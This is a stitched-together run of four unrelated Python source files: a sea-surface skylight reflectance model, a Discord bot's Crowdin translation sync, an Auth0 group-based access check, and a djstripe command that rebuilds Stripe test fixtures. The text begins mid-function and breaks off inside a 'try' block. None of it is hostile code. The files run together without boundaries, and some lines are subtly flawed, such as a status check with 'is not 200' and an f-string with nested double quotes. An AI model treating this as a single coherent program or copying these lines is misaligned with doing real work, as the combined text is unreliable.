np.arctan2(z,np.sqrt(x**2 + y**2)) r = np.sqrt(x**2 + y**2 + z**2) return azimuth, elevation, r azm,zen,r = cart2sph(n[:,0],n[:,1],n[:,2]) zen = π/2 - zen return azm, zen, r def gen_vec_polar(zen, sun05, num=10): """ Generates vectros for the polar cap, quad, and sun disk. By convention, the sun disk is at XZ plane, i.e., azimuth = 0. 
Inputs ------ zen : Sun zenith angle sun05 : num : Number of angles to consider Outputs ------- vec : Polar cap vector """ ϕ = np.linspace(0, 2*π, num) sin_sun05 = np.sin(sun05) x = (sin_sun05*np.cos(ϕ)).tolist() x1 = np.insert(x,0,0) y = (sin_sun05*np.sin(ϕ)).tolist() y1 = np.insert(y,0,0) z = (np.cos(sun05)*np.ones_like(ϕ)).tolist() z1 = np.insert(z,0,1) tmp = np.array([x1,y1,z1]) Ry = [[np.cos(zen), 0, np.sin(zen)], [0, 1, 0], [-np.sin(zen), 0, np.cos(zen)]] vec = np.fliplr(np.rot90(np.matmul(Ry,tmp),-1)) return vec def prob_reflection(inc, refl, wind): """ Estimates the probability of facets reflecting incident light into a given direction for a given wind speed. Inputs ------ inc : incident light vector (either -sun or -sky) refl : reflected light vector (sensor) wind : Wind speed (m/s) Outputs ------- prob : Probability ang : Reflection angle """ def vec_length(a): # the length of vector a al = np.sum(abs(a)**2, 1)**0.5 return al def cox_munk(wind): # Cox and Munk slope distribution of capillary wave facets sigma = np.sqrt(0.003+0.00512*wind) return sigma def rayleighcdf(x,s): # Cumulative distribution function for Rayleigh distribution t = (x/s)**2 y = 1-np.exp(-t/2) return y # Elementwise broadcasting 1x3(refl) onto 101x3(inc) n = refl - inc vLen = vec_length(n).reshape(vec_length(n)[:].shape[0],1) n = n/vLen # the zenith and azimuth angles of the facets azm_n,zen_n,_ = my_cart2sph(n) # convert facet zenith angle to slopes slope = np.tan(zen_n) # estimate wind-roughened probability of facets # sigma2 = 0.003 + 0.00512*wind; # sigma = sigma2^0.5; sigma = cox_munk(wind) # p1 = normcdf(max(slope),0,sigma) - normcdf(min(slope),0,sigma); # !!! see document On the Cox and Munk sigma = sigma/np.sqrt(2) p1 = rayleighcdf(max(slope),sigma)-rayleighcdf(min(slope),sigma) #} !!! # azimuth angle ranges from -180 to 180. Need to treat the cases when the # azimuth angles cover both positive and negative ranges. # case 1: -2 -1 1 2 # case 2: -179, -178, 178, 179 # case 3: -179 -120 2 5 130 178 # cases 1 and 2: the range should be 4 # case 3: the range should be 357 azm_nx = max(azm_n) azm_nn = min(azm_n) if azm_nx*azm_nn >0: # not an issue p2 = (azm_nx-azm_nn)/2/π elif any(abs(azm_n)<π/2): # cases 1 and 3 p2 = (azm_nx-azm_nn)/2/π else: # case 2 ind = azm_n<0 azm_n[ind] = azm_n[ind]+2*π azm_nx = max(azm_n) azm_nn = min(azm_n) p2 = (azm_nx-azm_nn)/2/π prob = 2*p1*p2 # factor 2 accounts for 180 degree ambiguity # incident angle # cosw = sum(bsxfun(@times,n,refl),2) cosw = np.sum(n*refl,1) ang = np.arccos(cosw) ind = ang>π/2 ang[ind] = π - ang[ind] ang = np.mean(ang) return prob, ang def sw_fresnel(wv,ang,T,S): """ Calculates Fresnel reflectance for seawater. Inputs ------ wv : Wavelength (nm) ang : Reflectance angle T : Temperature (°C) S : Salinity (PSU) Outputs ------- m : Refractive index ref : Fresnel reflectance of seawater """ m = index_w(wv,T,S) ref = fresnel(m,ang) return ref def index_w(wv, T, S): """ Calculates water refractive index mw(wv,T,S)=n0+(n1+n2T+n3T^2)S+n4T^2+(n5+n6S+n7T)/wv+n8/wv^2+n9/wv^3; Inputs ------- wv : Wavelength (nm) T : Temperature (°C) S : Salinity (PPT) """ n0=1.31405 n1=1.779e-4 n2=-1.05e-6 n3=1.6e-8 n4=-2.02e-6 n5=15.868 n6=0.01155 n7=-0.00423 n8=-4382 n9=1.1455e6 n0_4=n0+(n1+n2*T+n3*T**2)*S+n4*T**2 n5_7=n5+n6*S+n7*T wv = np.array(wv, dtype=float) mw=n0_4+n5_7*(wv**-1)+n8*(wv**-2)+n9*(wv**-3) return mw def fresnel(m ,ang): """ This function calculates the Fresnel reflectances for electric vector parallel (Rp), perpendicular (Rr) and unpolarized incident light. 
The reflection matrix = [R11, R12, 0; R12, R11, 0; 0, 0, R33] Only accounts for I, Q, U and ignore the V component. Revision History 2016-07-10: 1st version, just compute R11, i.e, R 2016-12-14: add other reflection matrix elements R12 and R33 Also found an error in the previous equaiton for Rp1 Inputs ------ m : Relative refractive index ang : Reflectance (incident) angle Outputs ------- R : Fresnel reflectance matrix element (1, 1) R12 : Fresnel reflectance matrix element (1, 2) R33 : Fresnel reflectance matrix element (3, 3) """ ang = np.reshape(ang,(-1,1)) m = np.reshape(m,(1,-1)) cosang = abs(np.cos(ang)) # cosine of incident angle sinangr = np.sin(ang)*(1/m) # sine of refraction angle cosangr = (1-sinangr**2)**0.5 # cosine of refraction angle # # reflection coefficient for perpendicular incident light tmp = cosangr*m Rr1 = (cosang - tmp)/(cosang + tmp) # # Rr1=(cosang-m*cosangr)./(cosang+m*cosangr) # # reflection coefficient for parallel incident light tmp = cosang*m # this was previous one # Rp1 = bsxfun(@minus,cosangr,tmp)./bsxfun(@plus,cosangr,tmp) Rp1 = (tmp - cosangr)/(cosangr + tmp) # Rp1=(cosangr-m*cosang)./(cosangr+m*cosang); Rr = np.abs(Rr1)**2 # reflectance for perpendicular incident light Rp = np.abs(Rp1)**2 # reflectance for parallel incident light R = (Rr+Rp)/2 R12 = (Rp-Rr)/2 R33 = np.real(Rr1*np.conj(Rp1)) return [R, R12, R33] def my_interpn(dbArray, coords, dims, interpCoords): ''' Interpolates an n-D array defined by axes/values coords to the points defined in interpCoords Inputs --- dbArray : n-D array of model outputs in the database coords : list of n arrays defining the coordinates in dbArray interpCoords : list of n arrays defining the values at which to interpolate dbArray Outputs --- interpArray : n-D array of dbArray values interpolated to interpCoords ''' da = xr.DataArray(name='dbArray', data=dbArray, dims=dims, coords=coords) interpDict = dict(zip(da.dims, interpCoords)) interpXR = da.interp(**interpDict).squeeze() if len(interpXR.shape) > 1: interpArray = np.swapaxes(interpXR.data, 0, 1) else: interpArray = interpXR.data return interpArray def Main(env, sensor): """ Computes sea surface reflectance of skylight. Based on: Zhang, X., S. He, A. Shabani, P.-W. Zhai, and K. Du. 2017. Spectral sea surface reflectance of skylight. Opt. Express 25: A1-A13, doi:10.1364/OE.25.0000A1. Translated from Matlab by D. 
Aurin 1/2020 Inputs ------ env : Environmental variables (scalars) C(cloud; not used), od(aerosol optical depth), sal(salinity), wind, wtem(water temp), zen_sun(solar zenith angle) sensor: Sensor configurations ang([zenith angle (scalar), 180-relative solar azimuth angle (scalar)]), wv(list of waveband centers) (vector) Outputs ------- ρ : Spectral sea surface reflectance of sun/sky glint including sun(solar ρ), sky(sky ρ), sca2vec(), ρ(total ρ) """ ρ = collections.OrderedDict() load_db() sensor['ang2'] = sensor['ang'] + np.array([0, 180]) sensor['pol'] = np.deg2rad(sensor['ang']) # the sensor polar coordinate sensor['vec'] = my_sph2cart(sensor['pol'][1], sensor['pol'][0]) # sensor vector sensor['pol2'] = np.deg2rad(sensor['ang2']) # the skylight polar coordinate sensor['loc2'] = find_quads(*sensor['pol2']) # Probability and reflection angle of reflecting skylight into the sensor ''' Optionally stop using loop until the efficiency is addressed by saving and loading the result ''' prob, angr_sky = get_prob(env['wind'], sensor['vec']) # np.save('prob.npy',prob) # np.save('angr_sky.npy',angr_sky) # print('*****************Attention: Using saved values for now*****************') # prob = np.load('prob.npy') # angr_sky = np.load('angr_sky.npy') tprob = np.sum(prob,0) prob = np.reshape(prob, (-1,1)) ref = sw_fresnel(sensor['wv'],angr_sky,env['wtem'],env['sal']) # As currently formulated in Zhang's code, this only captures the # total reflectance (R), and ignores R12 and R33; confirmed w/ Zhang ref = ref[0] print('Interpolating skyrad') wave = db.wv.data.flatten() index = np.arange(1,skyrad0.data.shape[1]+1) aod = db.od.data.flatten() # limit 0 - 0.20 # if env['od'] >0.2: # print(f'AOD = {env["od"]}. Maximum Aerosol Optical Depth Reached. Setting to 0.2') # env['od'] = 0.2 solzen = db.zen_sun.data.flatten() # limit 0 - 60 # if env['zen_sol'] > 60: # print(f'SZA = {env["zen_sol"]}. Maximum solar elevation reached. 
Setting to 60') # env['zen_sol'] = 60 coords = [wave, index, aod, solzen] dims = ['wave','index','aod','solzen'] interpCoords = [sensor['wv'], index, env['od'], env['zen_sun']] skyrad = my_interpn(skyrad0.data, coords, dims, interpCoords) N0 = skyrad[sensor['loc2'].data] N = skyrad/N0 ρ['sky'] = np.sum((ref * N) * (prob / tprob),0) print('Interpolating sunrad') coords=[wave, aod, solzen] dims=['wave','aod','solzen'] interpCoords = [sensor['wv'], env['od'], env['zen_sun']] sunrad = my_interpn(sunrad0.data, coords, dims, interpCoords) sun_vec = gen_vec_polar(np.deg2rad(env['zen_sun']),quads.sun05.data) prob_sun,angr_sun = prob_reflection(-sun_vec,sensor['vec'],env['wind']) ref_sun = sw_fresnel(sensor['wv'],angr_sun,env['wtem'],env['sal']) ref_sun = ref_sun[0] ρ['sun']=(sunrad/N0)*(ref_sun*prob_sun/tprob) print('Interpolating rad_inc') azimuth = sdb.azm_view.data.flatten() senzen = sdb.zen_view.data.flatten() wave = sdb.wv.data.flatten() solzen = sdb.zen_sun.data.flatten() aod = sdb.od.data[9,:] wind = sdb.wind.data.flatten() coords = [azimuth,senzen,wave,solzen,aod,wind] dims = ['azimuth','senzen','wave','solzen','aod','wind'] interpCoords_inc = [180-sensor['ang'][1], 180-sensor['ang'][0], sensor['wv'], env['zen_sun'], env['od'], env['wind']] rad_inc_sca = my_interpn(rad_boa_sca.data, coords, dims, interpCoords_inc) print('Interpolating rad_mea') interpCoords_mea = [180-sensor['ang'][1], sensor['ang'][0], sensor['wv'], env['zen_sun'], env['od'], env['wind']] rad_mea_sca = my_interpn(rad_boa_sca.data, coords, dims, interpCoords_mea) ρ_sca = rad_mea_sca/rad_inc_sca print('Interpolating rad_inc_vec') azimuth = vdb.azm_view.data.flatten() senzen = vdb.zen_view.data.flatten() wave = vdb.wv.data.flatten() solzen = vdb.zen_sun.data.flatten() aod = vdb.od.data[9,:] wind = vdb.wind.data.flatten() coords = [azimuth,senzen,wave,solzen,aod,wind] interpCoords = [180-sensor['ang'][1], 180-sensor['ang'][0], sensor['wv'], env['zen_sun'], env['od'], env['wind']] rad_inc_vec = my_interpn(rad_boa_vec.data, coords, dims, interpCoords_inc) print('Interpolating rad_mea_vec') rad_mea_vec = my_interpn(rad_boa_vec.data, coords, dims, interpCoords_mea) ρ_vec = rad_mea_vec/rad_inc_vec ρ['sca2vec'] = ρ_vec/ρ_sca ρ['ρ'] = ρ['sky']*ρ['sca2vec'] + ρ['sun'] return ρ
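# ---------------------------------------------------------------------------
# Usage sketch (illustrative, not part of the module): the values below are
# hypothetical placeholders, and Zhang_rho_db.mat must exist at db_path for
# Main() to run. Key names follow the Main() docstring above.
# ---------------------------------------------------------------------------
if __name__ == '__main__':
    example_env = {
        'C': 0,           # cloud cover (unused by Main)
        'od': 0.10,       # aerosol optical depth
        'sal': 34.0,      # salinity (PSU)
        'wind': 5.0,      # wind speed (m/s)
        'wtem': 20.0,     # water temperature (deg C)
        'zen_sun': 30.0,  # solar zenith angle (deg)
    }
    example_sensor = {
        'ang': np.array([40.0, 135.0]),  # [viewing zenith, 180 - relative solar azimuth] (deg)
        'wv': np.array([412.0, 443.0, 490.0, 555.0, 665.0]),  # waveband centers (nm)
    }
    rho = Main(example_env, example_sensor)
    print(rho['ρ'])  # total glint reflectance spectrum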
import asyncio import json import os import shutil import threading import zipfile import aiohttp import requests from Util import Configuration, GearbotLogging, Emoji LANGS = dict() BOT = None def on_ready(bot_in): global BOT BOT = bot_in load_translations() def load_translations(): directory = os.fsencode("lang") for file in os.listdir(directory): filename = os.fsdecode(file) if filename.endswith(".json"): with open(f"lang/{filename}", encoding="UTF-8") as lang: LANGS[filename[:-5]] = json.load(lang) def assemble(emoji, key, location, **kwargs): return f"{Emoji.get_chat_emoji(emoji)} {translate(key, location, **kwargs)}" def translate(key, location, **kwargs): lid = None if location is not None: if hasattr(location, "guild"): location = location.guild if location is not None and hasattr(location, "id"): lid = location.id else: lid = location if lid is None: lang_key = "en_US" else: lang_key = Configuration.get_var(lid, "LANG") if key in LANGS[lang_key].keys(): return LANGS[lang_key][key].format(**kwargs) else: if key in LANGS["en_US"].keys(): return LANGS["en_US"][key].format(**kwargs) return key async def update(): message = await GearbotLogging.bot_log(f"{Emoji.get_chat_emoji('REFRESH')} Updating translations") project_key = Configuration.get_master_var("CROWDIN_KEY") session: aiohttp.ClientSession = BOT.aiosession async with session.get(f"https://api.crowdin.com/api/project/Gearbot/export?key={project_key}&json",) as reply: if reply.status is not 200: await GearbotLogging.bot_log(f"{Emoji.get_chat_emoji('WARNING')} Crowdin api error, got response code {reply.status}") else: response = await reply.json() if response["success"]["status"] == "built": # only update translations if we actually got a new build, should be every time though unless this runs 2x within 30 mins for some reason async with session.get( f"https://api.crowdin.com/api/project/Gearbot/download/all.zip?key={project_key}") as reply: data = await reply.read() with open("zip.zip", "wb") as file: file.write(data) with zipfile.ZipFile("zip.zip", "r") as archive: tempdir = os.path.abspath("temp") if os.path.isdir(tempdir): shutil.rmtree(tempdir, ignore_errors=True) os.mkdir(tempdir) archive.extractall("temp") for entry in archive.filelist: if not entry.filename.endswith(".json"): continue filename =entry.filename[-10:] if os.path.isfile(os.path.abspath(f"lang/{filename}")): os.remove(os.path.abspath(f"lang/{filename}")) archive.extract(entry, tempdir) os.rename(os.path.abspath(f"temp/{entry.filename}"), os.path.abspath(f"lang/{filename}")) shutil.rmtree("temp", ignore_errors=True) load_translations() await message.edit(content=f"{Emoji.get_chat_emoji('YES')} Translations have been updated") else: await message.edit(content=f"{Emoji.get_chat_emoji('WARNING')} Crowdin build status was `{response['success']['status']}`, no translation update required") async def upload(): if Configuration.get_master_var("CROWDIN_KEY", None) is None: return message = await GearbotLogging.bot_log(f"{Emoji.get_chat_emoji('REFRESH')} Uploading translation file") t = threading.Thread(target=upload_file) t.start() while t.is_alive(): await asyncio.sleep(1) await message.edit(content=f"{Emoji.get_chat_emoji('YES')} Translations file has been uploaded") def upload_file(): data = {'files[master/lang/en_US.json]': open('lang/en_US.json', 'r')} project_key = Configuration.get_master_var("CROWDIN_KEY") requests.post(f"https://api.crowdin.com/api/project/gearbot/update-file?key={project_key}&json", files=data)
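# ---------------------------------------------------------------------------
# Fallback illustration (a sketch, not part of the cog): translate() first
# tries the language configured for the guild, then en_US, then returns the
# raw key. Populating LANGS by hand avoids needing the lang/ directory, and
# passing location=None keeps the lookup on en_US. The helper name below is
# hypothetical; calling it overwrites LANGS["en_US"], so it is illustration
# only.
# ---------------------------------------------------------------------------
def _demo_translate_fallback():
    LANGS["en_US"] = {"greeting": "Hello {name}!"}
    # key present in en_US -> formatted string
    assert translate("greeting", None, name="Gears") == "Hello Gears!"
    # key missing everywhere -> the key itself is returned unchanged
    assert translate("missing_key", None) == "missing_key"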
import requests import os import logging from dss import Config from dss import dynamodb as db from dss.error import DSSForbiddenException, DSSException from .authorize import Authorize, always_allow_admins logger = logging.getLogger(__name__) class FlacMixin(Authorize): """ Mixin class for Auth0 Authorize class to use fine-level access control (FLAC) table to check if a user is allowed to access a given UUID. """ flac_lookup_table_name = f"dss-auth-lookup-{os.environ['DSS_DEPLOYMENT_STAGE']}" def _assert_authorized_flac(self, **kwargs): """ kwargs contains information from both the original API function call and from the security decorator. Use both to look up this UUID in the FLAC table. """ # uuid = kwargs['uuid'] # method = kwargs['method'] # email = self.token_email # group = self.token_group # Do FLAC lookup here self.assert_required_parameters(kwargs, ["uuid", "method"]) uuid = kwargs.get('uuid') try: flac_attributes = db.get_item(table=self.flac_lookup_table_name, hash_key=uuid) except db.DynamoDBItemNotFound as ex: msg = f'uuid: {uuid} was not found in the flac table' logger.info(msg, ex) return else: try: self.assert_auth0authz_groups_intersects(flac_attributes['groups']) except DSSForbiddenException: # Re-raise the exception with better context msg = f'User: {self.token} does not have sufficient privileges for object: {flac_attributes}' raise DSSForbiddenException(msg) else: return # TODO what about users? should the class be able to handle users and/or groups? class Auth0AuthZGroupsMixin(Authorize): """ Mixin class for Auth0 Authorize class to access groups information added to the JWT by the Auth0 AuthZ extension. These are the groups used to determine FLAC access. (Note: the Auth0 AuthZ extension adds groups, roles, and permissions, but here we just use groups.) """ @classmethod def get_auth0authz_claim(self): oidc_audience = Config.get_audience()[0] return f"{oidc_audience}auth0" @property def auth0authz_groups(self): """Property for the groups added to the JWT by the Auth0 AuthZ plugin""" # First get the portion of the token added by the Auth0 AuthZ extension auth0authz_claim = self.get_auth0authz_claim() self._assert_required_token_parameters([auth0authz_claim]) auth0authz_token = self.token[auth0authz_claim] # Second extract the groups from this portion auth0authz_groups_claim = "groups" self.assert_required_parameters(auth0authz_token, [auth0authz_groups_claim]) groups = self.token[auth0authz_claim][auth0authz_groups_claim] return groups def assert_auth0authz_groups_intersects(self, groups): """ Assert that the intersection of Auth0 AuthZ groups and user-provided groups has cardinality greater than zero (intersection has at least 1 member). """ cardinality = len(set(self.auth0authz_groups).intersection(set(groups))) if cardinality > 0: return else: raise DSSForbiddenException() class Auth0(FlacMixin, Auth0AuthZGroupsMixin): """ Implements the Auth0 security flow, which implements different authorization checks based on whether operations are create/read/update/delete operations. 
Decorator examples: @security.assert_security(method='create', groups=['dbio', 'grp']) @security.assert_security(method='read') @security.assert_security(method='update', groups=['dbio', 'grp']) @security.assert_security(method='delete') """ def __init__(self): self.session = requests.Session() self.valid_methods = {'group': self._group, 'create': self._create, 'read': self._read, 'update': self._update, 'delete': self._delete} def security_flow(self, **kwargs): """ Dispatch pattern: the assert_security decorator will specify the type of operation (CRUD), which is passed through to the kwargs of this method, and used to call the correct method. """ # TODO add some type of jwt inspection self.assert_required_parameters(kwargs, ['method']) method = kwargs['method'] # Ensure method is valid if method is None or method not in self.valid_methods.keys(): err = f'Unable to locate auth_method {method} for request, valid methods are: ' err += f'{", ".join(self.valid_methods)}' raise DSSException(500, err) # Further kwarg processing should happen from # inside the method that needs the info. # Dispatch to correct method executed_method = self.valid_methods[method] executed_method(**kwargs) @always_allow_admins def _group(self, **kwargs): """Auth checks for 'group' API actions""" # This just checks that the JWT group is in the # list of allowed groups specified in the decorator self.assert_required_parameters(kwargs, ['groups']) self._assert_authorized_group(kwargs['groups']) return @always_allow_admins def _create(self, **kwargs): """Auth checks for 'create' API actions""" # Only check that the token group is in the security decorator's list of allowed groups self.assert_required_parameters(kwargs, ['groups']) self._assert_authorized_group(kwargs['groups']) return @always_allow_admins def _read(self, **kwargs): """Auth checks for 'read' API actions""" # Data is public if there is no FLAC table entry. self._assert_authorized_flac(**kwargs) return @always_allow_admins def _update(self, **kwargs): """Auth checks for 'update' API actions""" # Update requires read and create access # Assert user has read access read_kwargs = kwargs.copy() read_kwargs['method'] = 'read' self._read(**read_kwargs) # Assert user has create access create_kwargs = kwargs.copy() create_kwargs['method'] = 'create' self.assert_required_parameters(create_kwargs, ['groups']) self._create(**create_kwargs) return @always_allow_admins def _delete(self, **kwargs): """Auth checks for 'delete' API actions""" err = f"Delete action is only allowed for admin users, user: {self.token_email} is not permitted" raise DSSForbiddenException(err)
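# ---------------------------------------------------------------------------
# Illustration (a sketch, not part of the module): the FLAC check boils down
# to a non-empty intersection between the groups carried in the JWT (added by
# the Auth0 AuthZ extension) and the groups stored on the FLAC table entry.
# The standalone helper below is hypothetical; it mirrors what
# assert_auth0authz_groups_intersects() enforces by raising otherwise.
# ---------------------------------------------------------------------------
def _groups_intersect(token_groups, flac_groups):
    """Return True when the token and the FLAC entry share at least one group."""
    return len(set(token_groups) & set(flac_groups)) > 0

# _groups_intersect(["dbio"], ["dbio", "grp"])   -> True  (access allowed)
# _groups_intersect(["other"], ["dbio", "grp"])  -> False (DSSForbiddenException)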
import json from copy import deepcopy from typing import Dict, List, Set, Type import stripe.api_resources import stripe.stripe_object import tests from django.core.management import BaseCommand from stripe.error import InvalidRequestError import djstripe.models import djstripe.settings """ Key used to store fake ids in the real stripe object's metadata dict """ FAKE_ID_METADATA_KEY = "djstripe_test_fake_id" class Command(BaseCommand): """ This does the following: 1) Loads existing fixtures from JSON files 2) Attempts to read the corresponding objects from Stripe 3) If found, for types Stripe doesn't allow us to choose ids for, builds a map between the fake ids in the fixtures and the real Stripe ids 4) If not found, creates objects in Stripe from the fixtures 5) Saves the objects back as fixtures, using fake ids where available The rationale is that the fixtures can be updated automatically with Stripe schema changes by running this command. This should make keeping our tests and model schema compatible with Stripe schema changes less painstaking and simplify the process of upgrading the targeted Stripe API version. """ help = "Command to update test fixtures using a real Stripe account." fake_data_map = {} # type: Dict[Type[djstripe.models.StripeModel], List] fake_id_map = {} # type: Dict[str, str] def add_arguments(self, parser): parser.add_argument( "--delete-stale", action="store_true", help="Delete any untouched fixtures in the directory", ) parser.add_argument( "--update-sideeffect-fields", action="store_true", help="Don't preserve sideeffect fields such as 'created'", ) def handle(self, *args, **options): do_delete_stale_fixtures = options["delete_stale"] do_preserve_sideeffect_fields = not options["update_sideeffect_fields"] common_readonly_fields = ["object", "created", "updated", "livemode"] common_sideeffect_fields = ["created"] # TODO - is it possible to get a list of which fields are writable from # the API? maybe using https://github.com/stripe/openapi ? # (though that's only for the current version) """ Fields that we treat as read-only. Most of these will cause an error if sent to the Stripe API. """ model_extra_readonly_fields = { djstripe.models.Account: ["id"], djstripe.models.Customer: [ "account_balance", "currency", "default_source", "delinquent", "invoice_prefix", "subscriptions", "sources", ], djstripe.models.BankAccount: [ "id", "bank_name", "customer", "last4", "fingerprint", "status", ], djstripe.models.Card: [ "id", "address_line1_check", "address_zip_check", "brand", "country", "customer", "cvc_check", "dynamic_last4", "exp_month", "exp_year", "fingerprint", "funding", "last4", "tokenization_method", ], djstripe.models.PaymentIntent: ["id"], djstripe.models.PaymentMethod: ["id"], djstripe.models.Source: [ "id", "amount", "card", "client_secret", "currency", "customer", "flow", "owner", "statement_descriptor", "status", "type", "usage", ], djstripe.models.Subscription: [ "id", # not actually read-only "billing_cycle_anchor", # seems that this is replacing "billing"? 
(but they can't both be set) "collection_method", "current_period_end", "current_period_start", "latest_invoice", "start", "start_date", "status", ], } # type: Dict[Type[djstripe.models.StripeModel], List[str]] """ Fields that we don't care about the value of, and that preserving allows us to avoid churn in the fixtures """ model_sideeffect_fields = { djstripe.models.BalanceTransaction: ["available_on"], djstripe.models.Source: ["client_secret"], djstripe.models.Charge: ["receipt_url"], djstripe.models.Subscription: [ "billing_cycle_anchor", "current_period_start", "current_period_end", "start", "start_date", ], djstripe.models.SubscriptionItem: [ # we don't currently track separate fixtures for SubscriptionItems "id" ], djstripe.models.Product: ["updated"], djstripe.models.Invoice: [ "date", "finalized_at", "hosted_invoice_url", "invoice_pdf", "webhooks_delivered_at", "period_start", "period_end", # we don't currently track separate fixtures for SubscriptionItems "subscription_item", ], } # type: Dict[Type[djstripe.models.StripeModel], List[str]] object_sideeffect_fields = { model.stripe_class.OBJECT_NAME: set(v) for model, v in model_sideeffect_fields.items() } # type: Dict[str, Set[str]] self.fake_data_map = { # djstripe.models.Account: [tests.FAKE_ACCOUNT], djstripe.models.Customer: [ tests.FAKE_CUSTOMER, tests.FAKE_CUSTOMER_II, tests.FAKE_CUSTOMER_III, tests.FAKE_CUSTOMER_IV, ], djstripe.models.BankAccount: [tests.FAKE_BANK_ACCOUNT_SOURCE], djstripe.models.Card: [ tests.FAKE_CARD, tests.FAKE_CARD_II, tests.FAKE_CARD_V, ], djstripe.models.Source: [tests.FAKE_SOURCE], djstripe.models.Product: [tests.FAKE_PRODUCT], djstripe.models.Plan: [tests.FAKE_PLAN, tests.FAKE_PLAN_II], djstripe.models.Subscription: [ tests.FAKE_SUBSCRIPTION, tests.FAKE_SUBSCRIPTION_II, tests.FAKE_SUBSCRIPTION_III, tests.FAKE_SUBSCRIPTION_MULTI_PLAN, ], djstripe.models.Invoice: [tests.FAKE_INVOICE], djstripe.models.Charge: [tests.FAKE_CHARGE], djstripe.models.PaymentIntent: [tests.FAKE_PAYMENT_INTENT_I], djstripe.models.PaymentMethod: [tests.FAKE_PAYMENT_METHOD_I], djstripe.models.BalanceTransaction: [tests.FAKE_BALANCE_TRANSACTION], } self.init_fake_id_map() objs = [] # Regenerate each of the fixture objects via Stripe # We re-fetch objects in a second pass if they were created during # the first pass, to ensure nested objects are up to date # (eg Customer.subscriptions), for n in range(2): any_created = False self.stdout.write(f"Updating fixture objects, pass {n}") # reset the objects list since we don't want to keep those from # the first pass objs.clear() for model_class, old_objs in self.fake_data_map.items(): readonly_fields = ( common_readonly_fields + model_extra_readonly_fields.get(model_class, []) ) for old_obj in old_objs: created, obj = self.update_fixture_obj( old_obj=deepcopy(old_obj), model_class=model_class, readonly_fields=readonly_fields, do_preserve_sideeffect_fields=do_preserve_sideeffect_fields, object_sideeffect_fields=object_sideeffect_fields, common_sideeffect_fields=common_sideeffect_fields, ) objs.append(obj) any_created = created or any_created if not any_created: # nothing created on this pass, no need to continue break else: self.stderr.write( "Warning, unexpected behaviour - some fixtures still being created " "in second pass?" 
) # Now the fake_id_map should be complete and the objs should be up to date, # save all the fixtures paths = set() for obj in objs: path = self.save_fixture(obj) paths.add(path) if do_delete_stale_fixtures: for path in tests.FIXTURE_DIR_PATH.glob("*.json"): if path in paths: continue else: self.stdout.write("deleting {}".format(path)) path.unlink() def init_fake_id_map(self): """ Build a mapping between fake ids stored in Stripe metadata and those obj's actual ids We do this so we can have fixtures with stable ids for objects Stripe doesn't allow us to specify an id for (eg Card). Fixtures and tests will use the fake ids, when we talk to stripe we use the real ids :return: """ for fake_customer in self.fake_data_map[djstripe.models.Customer]: try: # can only access Cards via the customer customer = djstripe.models.Customer( id=fake_customer["id"] ).api_retrieve() except InvalidRequestError: self.stdout.write( f"Fake customer {fake_customer["id"]} doesn't exist in Stripe yet" ) return # assume that test customers don't have more than 100 cards... for card in customer.sources.list(limit=100): self.update_fake_id_map(card) for payment_method in djstripe.models.PaymentMethod.api_list( customer=customer.id, type="card" ): self.update_fake_id_map(payment_method) for subscription in customer["subscriptions"]["data"]: self.update_fake_id_map(subscription) def update_fake_id_map(self, obj): fake_id = self.get_fake_id(obj) actual_id = obj["id"] if fake_id: if fake_id in self.fake_id_map: assert self.fake_id_map[fake_id] == actual_id, ( f"Duplicate fake_id {fake_id} - reset your test Stripe data at " f"https://dashboard.stripe.com/account/data" ) self.fake_id_map[fake_id] = actual_id return fake_id else: return actual_id def get_fake_id(self, obj): """ Get a stable fake id from a real Stripe object, we use this so that fixtures are stable :param obj: :return: """ fake_id = None if isinstance(obj, str): real_id = obj real_id_map = {v: k for k, v in self.fake_id_map.items()} fake_id = real_id_map.get(real_id) elif "metadata" in obj: # Note: not all objects have a metadata dict # (eg Account, BalanceTransaction don't) fake_id = obj.get("metadata", {}).get(FAKE_ID_METADATA_KEY) elif obj.get("object") == "balance_transaction": # assume for purposes of fixture generation that 1 balance_transaction per # source charge (etc) fake_source_id = self.get_fake_id(obj["source"]) fake_id = "txn_fake_{}".format(fake_source_id) return fake_id def fake_json_ids(self, json_str): """ Replace real ids with fakes ones in the JSON fixture Do this on the serialized JSON string since it's a simple string replace :param json_str: :return: """ for fake_id, actual_id in self.fake_id_map.items(): json_str = json_str.replace(actual_id, fake_id) return json_str def unfake_json_ids(self, json_str): """ Replace fake ids with actual ones in the JSON fixture Do this on the serialized JSON string since it's a simple string replace :param json_str: :return: """ for fake_id, actual_id in self.fake_id_map.items(): json_str = json_str.replace(fake_id, actual_id) # special-case: undo the replace for the djstripe_test_fake_id in metadata json_str = json_str.replace( f'"{FAKE_ID_METADATA_KEY}": "{actual_id}"', f'"{FAKE_ID_METADATA_KEY}": "{fake_id}"', ) return json_str def update_fixture_obj( # noqa: C901 self, old_obj, model_class, readonly_fields, do_preserve_sideeffect_fields, object_sideeffect_fields, common_sideeffect_fields, ): """ Given a fixture object, update it via stripe :param model_class: :param old_obj: :param readonly_fields: 
:return: """ # restore real ids from Stripe old_obj = json.loads(self.unfake_json_ids(json.dumps(old_obj))) id_ = old_obj["id"] self.stdout.write(f"{model_class.__name__} {id_}", ending="") # For objects that we can't directly choose the ids of # (and that will thus vary between stripe accounts) # we fetch the id from a related object if issubclass(model_class, djstripe.models.Account): created, obj = self.get_or_create_stripe_account( old_obj=old_obj, readonly_fields=readonly_fields ) elif issubclass(model_class, djstripe.models.BankAccount): created, obj = self.get_or_create_stripe_bank_account( old_obj=old_obj, readonly_fields=readonly_fields ) elif issubclass(model_class, djstripe.models.Card): created, obj = self.get_or_create_stripe_card( old_obj=old_obj, readonly_fields=readonly_fields ) elif issubclass(model_class, djstripe.models.Source): created, obj = self.get_or_create_stripe_source( old_obj=old_obj, readonly_fields=readonly_fields ) elif issubclass(model_class, djstripe.models.Invoice): created, obj = self.get_or_create_stripe_invoice( old_obj=old_obj, writable_fields=["metadata"] ) elif issubclass(model_class, djstripe.models.Charge): created, obj = self.get_or_create_stripe_charge( old_obj=old_obj, writable_fields=["metadata"] ) elif issubclass(model_class, djstripe.models.PaymentIntent): created, obj = self.get_or_create_stripe_payment_intent( old_obj=old_obj, writable_fields=["metadata"] ) elif issubclass(model_class, djstripe.models.PaymentMethod): created, obj = self.get_or_create_stripe_payment_method( old_obj=old_obj, writable_fields=["metadata"] ) elif issubclass(model_class, djstripe.models.BalanceTransaction): created, obj = self.get_or_create_stripe_balance_transaction( old_obj=old_obj ) else: try: # fetch from Stripe, using the active API version # this allows us regenerate the fixtures from Stripe # and hopefully, automatically get schema changes obj = model_class(id=id_).api_retrieve() created = False self.stdout.write(" found") except InvalidRequestError: 